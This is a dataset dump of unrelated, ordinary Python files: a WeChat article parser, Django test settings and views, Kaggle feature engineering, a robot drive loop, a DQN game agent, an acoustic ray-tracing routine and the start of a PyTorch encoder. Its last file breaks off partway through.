} for index, i in enumerate(app_msg_ext_info_list)
]
msg_ext_list = [i['multi_app_msg_item_list'] for i in app_msg_ext_info_list]
for index_j, j in enumerate(msg_ext_list):
for index_i, i in enumerate(j):
msg_data_list.append(
{
# 'article_id': '%s_%03d' % (msg_id_list[index_j], index_i + 1),
'article_id': get_finger(i['title']),
'article_url': urljoin('https://mp.weixin.qq.com', un_escape(i['content_url'])),
'article_title': i['title'],
'article_abstract': i['digest'],
'article_pub_time': comm_msg_info_date_time_list[index_j],
}
)
return msg_data_list
| StarcoderdataPython |
1619354 | """
Django settings for test_django project.
Generated by 'django-admin startproject' using Django 1.11.6.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.11/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.11/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '<KEY>'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'django_extensions',
'djenga_tests',
'djenga',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'djenga_tests.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'tests.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.11/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.11/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'CST6CDT'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.11/howto/static-files/
STATIC_URL = '/static/'
DJENGA_FROM_EMAIL = ''
DJENGA_DEFAULT_RECIPIENTS = []
DJENGA_ENCRYPTION_KEY = 'sesame'
DJENGA_CELERY_MODULE = 'djenga_tests.celery'
CELERY_TIMEZONE = 'CST6CDT'
CELERY_BROKER_URL = 'redis://127.0.0.1:6379/14'
CELERY_RESULT_BACKEND = 'redisd://127.0.0.1:6379/15'
CELERY_RESULT_EXPIRES = 30 * 24 * 60 * 60 # 30 days
CELERY_TASK_SERIALIZER = 'pickle'
CELERY_RESULT_SERIALIZER = 'pickle'
CELERY_ACCEPT_CONTENT = [ 'pickle', 'json', ]
SHELL_PLUS = 'ipython'
LOGGING = {
'root': {
'level': 'DEBUG',
'handlers': [ 'console-brief' ],
},
'version': 1,
'disable_existing_loggers': False,
'formatters': {
'json': {
u'()': 'djenga.logging.JsonFormatter',
},
'console-detailed': {
u'format': u'%(funcName)s:%(lineno)d %(message)s',
u'()': u'djenga.loggers.ColorFormatter',
},
'console-brief': {
# uncomment this line if there is a logger
# printing out stuff that you want to suppress
# during debugging
# u'format': u'[%(name)s] %(message)s',
u'format': u'%(message)s',
u'()': u'djenga.loggers.BriefColorFormatter',
},
},
'handlers': {
'console-brief': {
'level': 'DEBUG',
'class': 'logging.StreamHandler',
'stream': 'ext://sys.stdout',
'formatter': 'console-brief',
},
},
}
| StarcoderdataPython |
6419930 | <gh_stars>0
import pandas as pd
import numpy as np
from sklearn.preprocessing import LabelEncoder
class FeatureEngineering:
def __init__(self):
self.air_visits = pd.read_csv("../input/restaurant-visitor-forecasting/train.csv")
self.air_reservations = pd.read_csv("../input/restaurant-visitor-forecasting/MetaData/MetaData/air_reserve.csv")
self.hpg_reservations = pd.read_csv("../input/restaurant-visitor-forecasting/MetaData/MetaData/hpg_reserve.csv")
self.air_stores = pd.read_csv("../input/restaurant-visitor-forecasting/MetaData/MetaData/air_store_info.csv")
self.date_data = pd.read_csv("/kaggle/input/restaurant-visitor-forecasting/MetaData/MetaData/date_info.csv")
self.test = pd.read_csv("/kaggle/input/restaurant-visitor-forecasting/test.csv")
self.store_IDs = pd.read_csv("../input/restaurant-visitor-forecasting/MetaData/MetaData/store_id_relation.csv")
def getProcessedData(self):
return self.air_visits, self.test
def remove_2016_Data(self):
#From index 47699, i.e. dates after July 1, 2016 follow the periodic trend.
self.air_visits = self.air_visits.sort_values('visit_date').reset_index(drop = True).iloc[47699:,:]
def add_next_holiday_flg(self):
#The dates are in order, so the next_holiday_flg will just be the holiday_flg column shifted 1 down.
hol_date = self.date_data["holiday_flg"].copy()
#Drop the first row of the holiday_flg column
hol_date.drop(hol_date.head(1).index, inplace = True)
#Add a row at the end, For convenience, the flg is set to 0.
hol_date.loc[len(hol_date)+1] = 0
self.date_data["next_day_holiday_flg"] = hol_date.reset_index(drop = True)
self.air_visits = self.air_visits.merge(self.date_data, left_on="visit_date", right_on="calendar_date").drop("calendar_date", axis = 1)
self.test = self.test.merge(self.date_data, left_on="visit_date", right_on="calendar_date").drop("calendar_date", axis = 1)
def mergeStoreInfo(self):
self.air_visits = self.air_visits.merge(self.air_stores, on="air_store_id")
self.test = self.test.merge(self.air_stores, on="air_store_id")
#Size refers to the no. of stores of particular genre in a particular area. Accounts for local competition
def addSizeFeature(self):
air_competition = self.air_stores.groupby(["air_genre_name", "air_area_name"], as_index = False).size()
self.air_visits = self.air_visits.merge(air_competition, on = ["air_genre_name", "air_area_name"])
self.test = self.test.merge(air_competition, on = ["air_genre_name", "air_area_name"])
def parseDate(self):
self.air_visits['visit_date'] = pd.to_datetime(self.air_visits['visit_date'],format='%Y-%m-%d')
self.air_visits['month'] = self.air_visits['visit_date'].dt.month
self.air_visits['year'] = self.air_visits['visit_date'].dt.year
self.air_visits['dow'] = self.air_visits['visit_date'].dt.dayofweek
self.test['visit_date'] = pd.to_datetime(self.test['visit_date'],format='%Y-%m-%d')
self.test['month'] = self.test['visit_date'].dt.month
self.test['year'] = self.test['visit_date'].dt.year
self.test['dow'] = self.test['visit_date'].dt.dayofweek
def create_area_genre_encoding(self):
#Label encoding based on the no. of visitors
col = "air_area_name"
area_encode = self.air_visits.groupby(col, as_index = False)['visitors'].sum().sort_values(by = "visitors").reset_index(drop = True)
area_encode["area_index_col"] = range(1, len(area_encode) + 1)
area_encode.drop(columns = "visitors", inplace = True)
col = "air_genre_name"
genre_encode = self.air_visits.groupby(col, as_index = False)['visitors'].sum().sort_values(by = "visitors").reset_index(drop = True)
genre_encode["genre_index_col"] = range(1, len(genre_encode) + 1)
genre_encode.drop(columns = "visitors", inplace = True)
return area_encode, genre_encode
def encodeAreaGenre(self):
area_encode, genre_encode = self.create_area_genre_encoding()
self.air_visits = self.air_visits.merge(area_encode, on = "air_area_name").drop(columns = "air_area_name")
self.air_visits = self.air_visits.merge(genre_encode, on = "air_genre_name").drop(columns = "air_genre_name")
self.test = self.test.merge(area_encode, on = "air_area_name").drop(columns = "air_area_name")
self.test = self.test.merge(genre_encode, on = "air_genre_name").drop(columns = "air_genre_name")
#Adds min mean max median count_observations for all the unique stores
def addAggregateFunctions(self):
#Find all unique stores from the test data.
unique_stores = self.test['air_store_id'].unique()
stores = pd.concat([pd.DataFrame({'air_store_id': unique_stores, 'dow': [i]*len(unique_stores)}) for i in range(7)], axis=0, ignore_index=True).reset_index(drop=True)
tmp = self.air_visits.groupby(['air_store_id','dow'], as_index=False)['visitors'].min().rename(columns={'visitors':'min_visitors'})
stores = pd.merge(stores, tmp, how='left', on=['air_store_id','dow'])
tmp = self.air_visits.groupby(['air_store_id','dow'], as_index=False)['visitors'].mean().rename(columns={'visitors':'mean_visitors'})
stores = pd.merge(stores, tmp, how='left', on=['air_store_id','dow'])
tmp = self.air_visits.groupby(['air_store_id','dow'], as_index=False)['visitors'].median().rename(columns={'visitors':'median_visitors'})
stores = pd.merge(stores, tmp, how='left', on=['air_store_id','dow'])
tmp = self.air_visits.groupby(['air_store_id','dow'], as_index=False)['visitors'].max().rename(columns={'visitors':'max_visitors'})
stores = pd.merge(stores, tmp, how='left', on=['air_store_id','dow'])
tmp = self.air_visits.groupby(['air_store_id','dow'], as_index=False)['visitors'].count().rename(columns={'visitors':'count_observations'})
stores = pd.merge(stores, tmp, how='left', on=['air_store_id','dow'])
self.air_visits = pd.merge(self.air_visits, stores, how='left', on=['air_store_id','dow'])
self.test = pd.merge(self.test, stores, how='left', on=['air_store_id','dow'])
def oneHotEncode_dayOfWeek(self):
self.air_visits = pd.get_dummies(data = self.air_visits, columns = ["dow"], prefix = ["dow"])
self.air_visits.drop(columns = "day_of_week", inplace = True)
self.test = pd.get_dummies(data = self.test, columns = ["dow"], prefix = ["dow"])
self.test.drop(columns = "day_of_week", inplace = True)
def preprocess_airReservations(self):
self.air_reservations['visit_datetime'] = pd.to_datetime(self.air_reservations['visit_datetime'])
self.air_reservations['visit_date'] = self.air_reservations['visit_datetime'].dt.date
self.air_reservations['reserve_datetime'] = pd.to_datetime(self.air_reservations['reserve_datetime'])
self.air_reservations['time_diff'] = self.air_reservations.apply(lambda x: (x['visit_datetime'] - x['reserve_datetime']).days, axis=1)
self.air_reservations = self.air_reservations.groupby(['air_store_id', 'visit_date'], as_index=False)[['time_diff', 'reserve_visitors']].sum()
def mergeStoreRelation(self):
self.hpg_reservations = pd.merge(self.hpg_reservations, self.store_IDs, how='inner', on=['hpg_store_id'])
def preprocess_hpgReservations(self):
self.mergeStoreRelation()
self.hpg_reservations['visit_datetime'] = pd.to_datetime(self.hpg_reservations['visit_datetime'])
self.hpg_reservations['visit_date'] = self.hpg_reservations['visit_datetime'].dt.date
self.hpg_reservations['reserve_datetime'] = pd.to_datetime(self.hpg_reservations['reserve_datetime'])
self.hpg_reservations['time_diff'] = self.hpg_reservations.apply(lambda x: (x['visit_datetime'] - x['reserve_datetime']).days, axis=1)
self.hpg_reservations = self.hpg_reservations.groupby(['air_store_id', 'visit_date'], as_index=False)[['time_diff', 'reserve_visitors']].sum()
def mergeReservationData(self):
#First merge hpg reservations with store_id_relation(to get corresponding air_store_ids)
self.air_visits['visit_date'] = self.air_visits['visit_date'].dt.date
self.test['visit_date'] = self.test['visit_date'].dt.date
self.air_visits = pd.merge(self.air_visits, self.air_reservations, how='left', on=['air_store_id','visit_date'])
self.air_visits = pd.merge(self.air_visits, self.hpg_reservations, how='left', on=['air_store_id','visit_date'])
self.test = pd.merge(self.test, self.air_reservations, how='left', on=['air_store_id','visit_date'])
self.test = pd.merge(self.test, self.hpg_reservations, how='left', on=['air_store_id','visit_date'])
def write_fe_csv(self):
self.air_visits.to_csv('./fe_train.csv', index=False)
self.test.to_csv('./fe_test.csv', index=False)
def main(fe):
fe.remove_2016_Data()
fe.add_next_holiday_flg()
fe.mergeStoreInfo()
fe.addSizeFeature()
fe.parseDate()
fe.encodeAreaGenre()
fe.addAggregateFunctions()
fe.oneHotEncode_dayOfWeek()
fe.preprocess_airReservations()
fe.preprocess_hpgReservations()
fe.mergeReservationData()
fe.write_fe_csv()
if __name__ == '__main__':
fe = FeatureEngineering()
main(fe)
data, test = fe.getProcessedData()
print(data.head())
print(data.columns)
print(test.head()) | StarcoderdataPython |
6658915 | <gh_stars>0
from scraper.model import ModelBase, CSVModel, JsonModel
from scraper.model.meeting_item import MeetingItem
class MeetingDetails(ModelBase, JsonModel, CSVModel):
def __init__(self, meeting_name=None, meeting_datetime=None, meeting_location=None,
published_agenda=None, agenda_packet=None, meeting_video=None,
agenda_status=None, minutes_status=None, published_minutes=None,
eComment=None, additional_notes=None, meeting_items=None):
super().__init__()
self.field_names = [
'meeting_name',
'meeting_datetime',
'meeting_location',
'published_agenda',
'agenda_packet',
'meeting_video',
'agenda_status',
'minutes_status',
'published_minutes',
'eComment',
'additional_notes',
'meeting_items'
]
self.list_field_class_dict = {'meeting_items': MeetingItem}
self._meeting_name = meeting_name
self.meeting_datetime = meeting_datetime
self._meeting_location = meeting_location
self.published_agenda = published_agenda
self.agenda_packet = agenda_packet
self.meeting_video = meeting_video
self.agenda_status = agenda_status
self.minutes_status = minutes_status
self.published_minutes = published_minutes
self.eComment = eComment
self.additional_notes = additional_notes
self.meeting_items = meeting_items
@property
def meeting_name(self):
return self.remove_starting_asterisk(self.filter_newlines(self._meeting_name))
@meeting_name.setter
def meeting_name(self, raw_name):
self._meeting_name = raw_name
@property
def meeting_location(self):
return self.filter_newlines(self._meeting_location)
@meeting_location.setter
def meeting_location (self, raw_meeting_location):
self._meeting_location = raw_meeting_location
@property
def meeting_details(self):
return self.filter_newlines(self._meeting_details)
@meeting_details.setter
def meeting_details(self, raw_meeting_details):
self._meeting_details = raw_meeting_details
def to_map(self):
map = super().to_map()
if map is not None and map.get('meeting_items', None) is not None:
map['meeting_items'] = MeetingItem.to_map_list(map['meeting_items'])
return map
| StarcoderdataPython |
6465246 | <reponame>SJ-Z/DjangoSite
from django.shortcuts import render
from django.contrib.contenttypes.models import ContentType
from django.http import JsonResponse
from django.db.models import ObjectDoesNotExist
from likes.models import LikeCount, LikeRecord
def success_response(liked_num):
data = {
'status': 'success',
'liked_num': liked_num
}
return JsonResponse(data)
def error_response(code, message):
data = {
'status': 'error',
'code': code,
'message': message
}
return JsonResponse(data)
def like_change(request):
# 获取数据
user = request.user
if not user.is_authenticated:
return error_response(401, '您尚未登录')
content_type = request.GET.get('content_type')
object_id = int(request.GET.get('object_id'))
# 验证博客是否存在
try:
content_type = ContentType.objects.get(model=content_type)
model_class = content_type.model_class()
model_obj = model_class.objects.get(pk=object_id)
except ObjectDoesNotExist:
return error_response(404, '对象不存在')
# 处理数据
if request.GET.get('is_like') == 'true':
# 要点赞
like_record, created = LikeRecord.objects.get_or_create(content_type=content_type, object_id=object_id,
user=user)
if created:
# 未点赞过
like_count, created = LikeCount.objects.get_or_create(content_type=content_type, object_id=object_id)
like_count.liked_num += 1
like_count.save()
return success_response(like_count.liked_num)
else:
# 已点赞过,不能重复点赞
return error_response(402, '您已点赞过,不能重复点赞')
else:
# 要取消点赞
if LikeRecord.objects.filter(content_type=content_type, object_id=object_id, user=user).exists():
# 有点赞过,取消点赞
like_record = LikeRecord.objects.get(content_type=content_type, object_id=object_id, user=user)
like_record.delete()
# 点赞总数-1
like_count, created = LikeCount.objects.get_or_create(content_type=content_type, object_id=object_id)
if not created:
like_count.liked_num -= 1
like_count.save()
return success_response(like_count.liked_num)
else:
return error_response(404, '数据错误')
else:
# 没点赞过,不能取消
return error_response(402, '您没有点赞过,不能取消点赞')
| StarcoderdataPython |
77145 | # Here's a basic robot loop to drive a robot using the left analog stick of
# an Xbox controller. The robot left and right drive motors are assumed
# to be connected to channels 0 and 1 of a Maestro controller.
import maestro
import xbox
import drive
import time
m = maestro.Controller()
dt = drive.DriveTrain(m, 0, 1) #maestro channels 0 and 1 for left and right motors
j = xbox.Joystick()
# Wrapping the robot loop in a try/finally structure makes sure that the robot stops
# moving if your code errors out or the robot loop completes.
try:
enabled = True
print "Robot loop started"
while enabled:
# As long as the joystick is connected, drive the robot, otherwise stop the motors
if j.connected():
# Joystick inputs are sent to the drive train in Arcade Drive mode
# If controls are backwards, simply negate the respective input
dt.drive(j.leftX(), j.leftY())
# Pressing the Xbox back button will disable the robot loop
if j.Back():
enabled = False
else:
dt.stop()
time.sleep(0.02) #Throttle robot loop to around 50hz
finally:
print "stopping robot"
dt.stop() #stop on error or loop completion
| StarcoderdataPython |
4802983 | from ferris import BasicModel, ndb
import logging
class Torrent(BasicModel):
hashString = ndb.StringProperty()
name = ndb.StringProperty()
status = ndb.StringProperty()
eta = ndb.DateTimeProperty()
@classmethod
def create(cls, params):
entity = cls.get(params['hashString'])
if entity:
item = entity
else:
item = cls(id=params['hashString'])
item.populate(**params)
item.put()
return item
@classmethod
def get(cls, key_name, key_only=False):
if not key_name:
return None
key = ndb.Key(cls, key_name)
ret = key.get()
if key_only:
return key if ret else None
return ret
| StarcoderdataPython |
9669850 | <gh_stars>0
import os
import numpy as np
from model import Agent
from utils import plot_learning_curve, make_env
LOAD = False
VERSION = '0'
if __name__ == '__main__':
env = make_env('SpaceInvaders-v0')
best_score = -np.inf
n_games = 1000
algo = 'DQN'
agent = Agent(input_space_dim=(env.observation_space.shape),
memory_size=50000, batch_size=32, action_num=6, gamma=0.99, epsilon_min=0.1,
epsilon_decay=5e-6, replace_count=5000, lr=1e-4, batch_norm=True, save=True, algo=algo)
if LOAD:
agent.load_models()
fname = algo + '_SpaceInvaders-v0_lr' + str(agent.lr) + '_' \
+ str(n_games) + 'games' + VERSION
fname = fname + '.png'
cur_dir = os.path.dirname(os.path.abspath(__file__))
figure_file = os.path.join(cur_dir, '.\\plots\\', fname)
n_steps = 0
scores, eps_history, steps_array = [], [], []
# Training loop
for i in range(n_games):
final = False
observation = env.reset()
score = 0
while not final:
action = agent.choose_action(observation)
next_obs, reward, final, info = env.step(action)
score += reward
if not LOAD:
agent.store_transition(state=observation, action=action,
reward=reward, next_state=next_obs, final=bool(final))
agent.learn()
observation = next_obs
n_steps += 1
scores.append(score)
steps_array.append(n_steps)
avg_score = np.mean(scores[-100:])
print('episode: ', i, 'score: ', score,
' average score %.1f' % avg_score, 'best score %.2f' % best_score,
'epsilon %.2f' % agent.epsilon, 'steps', n_steps)
if avg_score > best_score:
# if not LOAD:
# agent.save_models()
best_score = avg_score
eps_history.append(agent.epsilon)
if LOAD and n_steps >= 18000:
break
agent.save_models()
plot_learning_curve(steps_array, scores, eps_history, figure_file)
| StarcoderdataPython |
3506624 |
# Based off of <NAME>' ray-tracing algorithm (2003)
# Finds path between two locations with an atmospheric profile in between #
###########################################################################
import warnings
import numpy as np
import pyximport
pyximport.install(setup_args={'include_dirs':[np.get_include()]})
from supra.Supracenter.cynwDir import nwDir
def cyscan(supra_pos, detec_pos, z_profile, wind=True, n_theta=180, n_phi=180, h_tol=330, v_tol=2000):
# switched positions (Jun 2019)
# This function should be called for every station
# Original Author: <NAME>
""" Finds an optimal ray from the source of the Supracenter to the detector, by making a guess,
and checking for the angle of minimum error. This is repeated with better guesses by taking angles around the best angle of the previous step.
Arguments:
supra_pos: [array] 3-D local coordinates of the source of the sound. Given as: [x, y, Elevation]
detec_pos: [array] 3-D local coordinates of the detector. Given as: [x, y, Elevation]
zProfile: [array] The given atmospheric profile between the source and the detector. Given as: [Height, Temperature, Wind Speed, Wind Direction] for different values of height
wind: [int] 0 - disable winds, 1 - enable winds. Temperature is still used.
n_theta, n_phi: [int] angle grid spacing of the takeoff, azimuth angles
tol: [float] Tolerance on the error of the takeoff angle
precision: [double] minimum resolution of angles
Returns:
t_arrival: [float] Direct arrival time between source and detector
Azimuth: [float] The initial azimuthal angle for the source to the detector in degrees
Takeoff: [float] The initial takeoff angle from the source to the detector in degrees
See diagram on pg 34 of SUPRACENTER for more information
"""
# Azimuths and Wind directions are measured as angles from north, and increasing clockwise to the East
# Switch to turn off winds
if not wind:
z_profile[:, 2] = 0
found = False
### Initialize variables ###
# Initial grid spacing
# Azimuth angle (0 - 360 degrees from North due East)
dtheta = np.pi/n_theta
# Takeoff angle (90 - 180 degrees from vertical)
dphi = np.pi/2/n_phi
# Horizontal distance between source and a station.
dx = detec_pos[0] - supra_pos[0]
dy = detec_pos[1] - supra_pos[1]
# azth - initial guess for azimuth
azth = np.arctan2(dy, dx)
# The number of layers in the integration region
n_layers = len(z_profile)
# Slowness, as defined in SUPRACENTER on pg 35, s = 1/c
s = 1.0/z_profile[0:n_layers, 1]
# Elevation for that layer
z = z_profile[0:n_layers, 0]
# Set up grid of angles
phi = np.linspace(azth-np.pi/2, azth+np.pi/2, n_phi)
Phi = np.tile(phi, (n_theta, 1))
# Component of wind vector in the direction of phi and phi + pi/2 respectively
u = nwDir(z_profile[:, 2], z_profile[:, 3], phi)
v = nwDir(z_profile[:, 2], z_profile[:, 3], phi+np.pi/2)
# Construct ray parameter net
# Theta - the take-off angle, of the ray from the source to the station
theta = np.linspace(np.pi/2, np.pi, n_theta)
# move theta off of the singularity at pi/2
theta[0] += 1e-6
s_val = s[n_layers-1]
Theta = np.tile(theta, (n_phi, 1)).T
# Component of wind along the phi direction (azimuth)
u0 = np.tile(u[n_layers - 1, :], (n_theta, 1))
# ray parameter
p = s_val*np.sin(Theta)/(1 + s_val*u0*np.sin(Theta))
# Transformed x and y
X = np.zeros((n_theta, n_phi))
Y = np.zeros((n_theta, n_phi))
# Transformed wind componenets
U = np.empty((n_theta, n_phi))
V = np.empty((n_theta, n_phi))
#Travel time
t_arrival = 0
#azimuth angle
azimuth = 0
#takeoff angle
takeoff = 0
# ignore negative roots
last_error = 1e20
np.seterr(divide='ignore', invalid='ignore')
### Scan Loop ###
while not found:
trace=[]
a, b = np.cos(Phi), np.sin(Phi)
last_z = 0
for i in range(n_layers - 1):
s2 = s[i]**2
delz = z[i + 1] - z[i]
# Winds Enabled
if wind:
# clear old variables
# Wind transformation variables
U = np.tile(u[i, :], (n_theta, 1))
V = np.tile(v[i, :], (n_theta, 1))
p2 = p/(1 - p*U)
# This term produces nans
A = delz/np.sqrt(s2 - p2**2)
if np.isnan(A).all():
break
# Equation (10)
X += (p2 + s2*U)*A
# Equation (11)
Y += s2*V*A
# Calculate true destination positions (transform back)
#0.0016s
last_z = i + 1
# Winds Disabled
else:
# Equation (3)
X += p*(delz)/(np.sqrt(s2 - p**2))
last_z = i + 1
# Calculate true destination positions (transform back)
# x = supra_pos[0] + a*X - b*Y
# y = supra_pos[1] + b*X + a*Y
E = np.sqrt(((a*X - b*Y - dx)**2 + (b*X + a*Y - dy)**2 + (z[n_layers - last_z - 1] - detec_pos[2])**2))
with warnings.catch_warnings():
warnings.simplefilter("ignore")
k, l = np.where(E == np.nanmin(E))
# Check for all nan error function
if k.shape == (0, ):
# As handled in original Supracenter
return np.array([np.nan, np.nan, np.nan, np.nan, np.nan])
# If there are mulitple, take one closest to phi (in the middle)
if len(k > 1):
k, l = k[len(k)//2], l[len(l)//2]
# Compare these destinations with the desired destination, all imaginary values are "turned rays" and are ignored
# Ignore all nan slices - not interested in these points
# Find the position of the smallest value
new_error = E[k, l]
# #print(abs(new_error - last_error)/(last_error + 1e-6))
# if (abs(new_error - last_error)/(last_error + 1e-25) < 1) or (new_error > last_error):
# # pass on the azimuth & ray parameter information for use in traveltime calculation
# if new_error <= tol or dtheta < precision or dphi < precision:
# found = True
# else:
# # As handled in original Supracenter
# return np.array([np.nan, np.nan, np.nan])
if E[k, l] < v_tol or dtheta < h_tol or dphi < h_tol:
# pass on the azimuth & ray parameter information for use in traveltime calculation
if E[k, l] < v_tol:
# trace =
trace=[[supra_pos[0], supra_pos[1], supra_pos[2]]]
a, b = np.cos(Phi), np.sin(Phi)
last_z = 0
for i in range(n_layers - 1):
s2 = s[i]**2
delz = z[i + 1] - z[i]
# Winds Enabled
if wind:
# clear old variables
# Wind transformation variables
U = np.tile(u[i, :], (n_theta, 1))
V = np.tile(v[i, :], (n_theta, 1))
p2 = p/(1 - p*U)
# This term produces nans
A = delz/np.sqrt(s2 - p2**2)
if np.isnan(A).all():
break
# Equation (10)
X += (p2 + s2*U)*A
# Equation (11)
Y += s2*V*A
# Calculate true destination positions (transform back)
#0.0016s
last_z = i + 1
# Winds Disabled
else:
# Equation (3)
X += p*(delz)/(np.sqrt(s2 - p**2))
last_z = i + 1
# Calculate true destination positions (transform back)
x = supra_pos[0] + np.cos(Phi)*X + np.cos(Phi + np.pi/2)*Y
y = supra_pos[1] + np.sin(Phi)*X + np.sin(Phi + np.pi/2)*Y
trace.append([x[k, l], y[k, l], z[n_layers - 1 - last_z]])
#trace.append([x[k, l], y[k, l], z[n_layers - last_z]])
# print("Azimuth = {:}".format(np.degrees(np.arctan2(-trace[-1][0], -trace[-1][1]))))
# print("Elevation = {:}".format(np.degrees(np.arctan2(trace[-1][2], np.sqrt((trace[-1][0])**2 + (trace[-1][1])**2)))))
found = True
else:
return np.array([np.nan, np.nan, np.nan, np.nan, np.nan])
else:
### FAST PART ###
last_error = E[k, l]
# reduce evenly in both directions
n_phi = n_theta
# General Case: central take off angle is between 0 & 90 degrees
if ((theta[k] != np.pi/2) and (theta[k] != np.pi)):
# Respace net around best value
phi = np.linspace(phi[l] - dphi, phi[l] + dphi, n_phi)
dphi = 2*dphi/n_phi
# Check: theta must be > 90 degrees
if theta[k] - dtheta < np.pi/2:
theta = np.linspace(np.pi/2, theta[k] + 2*dtheta, n_theta)
else:
theta = np.linspace(theta[k] - dtheta, theta[k] + dtheta, n_theta)
dtheta = 2*dtheta/n_theta
# Case: central takeoff angle is at 180 degrees (vertical)
elif (theta[k] == np.pi):
# Respace net around best value
# Higher accuracy in n_phi helps here
phi = np.linspace(0, 2*np.pi - dphi, n_phi)
dphi = dphi/n_phi
theta = np.linspace(theta[k] - dtheta, theta[k], n_theta)
dtheta = dtheta/n_theta
# Case: central takeoff angle is at 90 degrees (horizontal)
elif (theta[k] == np.pi/2):
# Respace net around best value
phi = np.linspace(phi[l] - dphi, phi[l] + dphi, n_phi)
dphi = 2*dphi/n_phi
theta = np.linspace(np.pi/2, theta[k] + 2*dtheta, n_theta)
dtheta = dtheta/n_theta/2
# Update values, and try again
u = nwDir(z_profile[:, 2], z_profile[:, 3], phi)
v = nwDir(z_profile[:, 2], z_profile[:, 3], phi + np.pi/2)
n_theta = len(theta)
n_phi = len(phi)
# redefine variables
Phi = np.tile(phi, (n_theta, 1))
Theta = np.tile(theta, (n_phi, 1)).T
u0 = np.tile(u[0, :], (n_theta, 1))
### END FAST PART ###
#####
# The minimum becomes the center of the next net with borders one spacing away
X = np.zeros((n_theta, n_phi))
Y = np.zeros((n_theta, n_phi))
p = s_val*np.sin(Theta)/(1 + u0*np.sin(Theta)*s_val)
######################
### 0.0033s
# Final solution for initial azimuth angle
# Rotate coordinate system 90 degrees CCW
# Flip coordinate system horizontally
azimuth = (450 - phi[l]*180/np.pi)%360
# Final solution for intial takeoff angle
takeoff = (theta[k]*180/np.pi)%360
p1 = p[k, l]
p2 = p[k, l]**2
# Find sum of travel times between layers (z)
for i in range(n_layers - 1 - n_layers + last_z):
s2 = s[i]**2
# Equation (9)
t_arrival += (s2/np.sqrt(s2 - p2/(1 - p1*u[i, l])**2))*(z[i + 1] - z[i])
##########################
return t_arrival, azimuth, takeoff, E[k, l], trace
if __name__ == '__main__':
s = np.array([0, 0, 2])
d = np.array([0, 1.4, 0])
z_profile = np.array([ [0, 330, 1, 45],
[0.33, 320, 2, 45],
[0.67, 315, 2, 45],
[1.00, 310, 1, 42],
[1.33, 300, 4, 35],
[1.67, 293, 5, 30],
[2.00, 295, 10, 15]])
a, b, c, d, e = cyscan(s, d, z_profile)
print(e) | StarcoderdataPython |
1753775 | # -*- coding: utf-8 -*-
from .action import Action, InitializableAction
from ..registry import Registry
actions = Registry(Action, "Action") # type: Registry[Action]
| StarcoderdataPython |
9703293 | <gh_stars>0
import os
import json
class GenericDatabase:
def __init__(self, file_path):
self.path = os.path.join(os.getcwd(), file_path)
self.update()
def update(self):
with open(self.path, "r") as file:
self.data = json.load(file)
def set(self, name, value):
if self.data.get(name):
self.data[name] = value
with open(self.path, "w") as file:
file.write(json.dumps(self.data))
def get(self, name):
return self.data.get(name)
| StarcoderdataPython |
8138807 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('cassette', '0002_auto_20150717_1112'),
]
operations = [
migrations.CreateModel(
name='Results',
fields=[
('id', models.AutoField(serialize=False, auto_created=True, primary_key=True, verbose_name='ID')),
('sequenceLength', models.CharField(max_length=1000000)),
('donorSequence', models.CharField(max_length=1000000)),
('Lup', models.CharField(max_length=1000000)),
('Rup', models.CharField(max_length=1000000)),
('Ldown', models.CharField(max_length=1000000)),
('Rdown', models.CharField(max_length=1000000)),
('L', models.CharField(max_length=1000000)),
('R', models.CharField(max_length=1000000)),
],
),
migrations.RemoveField(
model_name='answer',
name='question',
),
migrations.RemoveField(
model_name='choice',
name='question',
),
migrations.DeleteModel(
name='Answer',
),
migrations.DeleteModel(
name='Choice',
),
migrations.DeleteModel(
name='Question',
),
]
| StarcoderdataPython |
11294531 | <gh_stars>0
import torch
from torch.autograd import Variable
import torch.nn as nn
from torch.nn import init
hasCuda = torch.cuda.is_available()
class Encoder(nn.Module):
"""
Applies a bi-direcitonl RNN
on the input character vectors.
It then uses a hidden/dense layer to
build the final hidden vectors of each step.
"""
def __init__(self, cfg):
super(Encoder, self).__init__()
self.cfg = cfg
#Size of input character vectors
in_size = cfg.src_em_size
self.src_rnn = nn.LSTM(
input_size=in_size,
hidden_size=cfg.h_units,
num_layers=1,
bias=True,
